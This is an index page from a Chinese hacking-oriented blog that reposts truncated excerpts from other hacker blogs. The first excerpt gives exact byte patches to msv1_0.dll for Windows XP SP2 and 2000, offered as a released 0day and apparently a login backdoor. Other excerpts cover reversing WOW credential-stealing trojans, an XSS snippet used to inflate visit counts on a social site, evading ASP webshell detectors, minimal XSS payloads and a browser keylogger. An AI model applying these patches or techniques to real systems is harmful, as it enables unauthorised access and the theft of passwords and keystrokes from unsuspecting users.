鬼仔's Blog

鬼仔注：我记得当初第一次看到这个0day是在红狼的荣誉会员区。现在7j放出来了。
另：这两天一直没在家，没怎么上网，所以一直没更新，抱歉。现在网吧。

来源：7jdg's blog

这东西再放都长毛了,放出来….精灵还写了个利用工具,找不到了.回头补上..

ystem32下 有个msv1_0.dll

xp sp2
F8 10 75 11 B0 01 8B 4D
修改为
E0 00 75 11 B0 01 8B 4D

2k professinal
F8 10 0F 84 71 FF FF
修改为
E0 00 0F 84 71 FF FF

2k sp4
F8 10 75 11 b0 01 8b 4D
修改为
E0 00 75 11 b0 01 8b 4D
阅读全文 »

鬼仔注：上篇在 这里 。open好像最近用繁体字上瘾了。

作者：Open[x.g.c] 中国X黑客小组 （ http://www.cnxhacker.com/ ）
来源：Open's Blog

整理一下亂七八糟的筆記。應是上二個月的事吧.接著上回。就當帶帶你們有些不會的入下門吧！
上次偶寫了一篇這次就不寫那麼詳細了（沒有看過第一篇的。可以在偶的BLOG中找找）
上回逆向的WOW木馬。用戶信息（收信地址）是經過加密後以附加數據的方式添加到文件的尾端。
這次要說的WOW木馬。不同於上一次。它把用戶信息直接直接寫到文件內。如何定位。其實相對來說是件很簡單的問題。
阅读全文 »

鬼仔注：前两天最早在sobiny那里看到的，后来在lcx那里看到相关代码，现在7j又写个php版本的
总结下

一、谈449
作者：sobiny[b.c.t]
来源：http://sobiny.cn

HTTP的状态码
大家经常见到的大概就是200，404，500等。

那449这个状态码是什么呢？
MSDN上的解释：
Retry after doing the appropriate action

GOOGLE在线翻译上说的是：
再审后,做适当的行动

呵呵，经过测试，IE浏览器接收到449这个HTTP状态码后的反应是：
先和普通的HTML的执行一样，先执行了449的返回的信息。
然后再自动浏览当前提交的页面。
其他浏览器没测试，估计也一样，不然就是浏览器的BUG了，因为这是正常的HTTP状态头呢。
阅读全文 »

来源：梦之光芒

本来不想提校内网的XSS来着，因为太多，没有提的必要。

不过最近室友争着问我为什么有的人的空间访问量已经达到了几千万（在百度这里相对比较容易，因为文章的访问也算在内。而校内网的不算，所以几百万算是天文数字了），而且数字还在以每秒钟若干的数据增长！所以这里也给大家看下。

懂XSS的好友知道，这里便是利用上XSS了。看了看他们的代码（涂鸦板），大致如下：

<link href="A308676992321RAT.wma" type="text/css" rel="stylesheet" />
<div class=addJs>A247165747728HOR.wma</div>

其中A308676992321RAT.wma里的代码如下：
阅读全文 »

作者：sobiny [b.c.t]
来源：http://sobiny.cn

今天在LCX牛牛的BLOG上看到了一个新的绕过那个什么查ASP 马的东西。。

怎么说呢，其实如果单说写文件到服务器上来留后门的话。
可能大概也只有10多种方法吧可以绕过吧。

但是像这种可以直接执行的，好象还少着。。

既然他们都公布得愉快。
我也发一个我觉得拿得出手的吧。
等着那些检测程序加入新的特征吧，啊哈哈。
阅读全文 »

作者：lcx
来源：vbs小铺

阅读全文 »

来源：VBS小铺

那天剑心问我，最短的跨站语句是多少？要放在以前，我一定会这样想，正常的跨站代码：<script> alert("a")</script> ，查一下，一共27个字符。嘿嘿，不过，这之前我在《黑客手册》上看到了他的一篇文章，《疯狂的跨站之行》，在这其中提到了跨站语句的另一种方法：
阅读全文 »

鬼仔注：我记得vbs小铺好像是lcx的。这个LOGweb版比较好玩，看说明吧。
update:有更新了，0.01版放在后面了。
update(2007.7.3 19:42):又更新了，lcx还真是勤奋，嘿嘿。

来源：vbs小铺

LOGweb 0.03版

修正2个BUG, 1是键盘大小写区分。2是有的键盘值会超过2个数字，读取紊乱的问题。3是加了模拟原页面的功能和记录鼠标是否在哪按键了(位置肯定不太准确)。

1。更新keymouse.htm如下：（可以该成vbs，<script src=*.vbs >调用）
阅读全文 »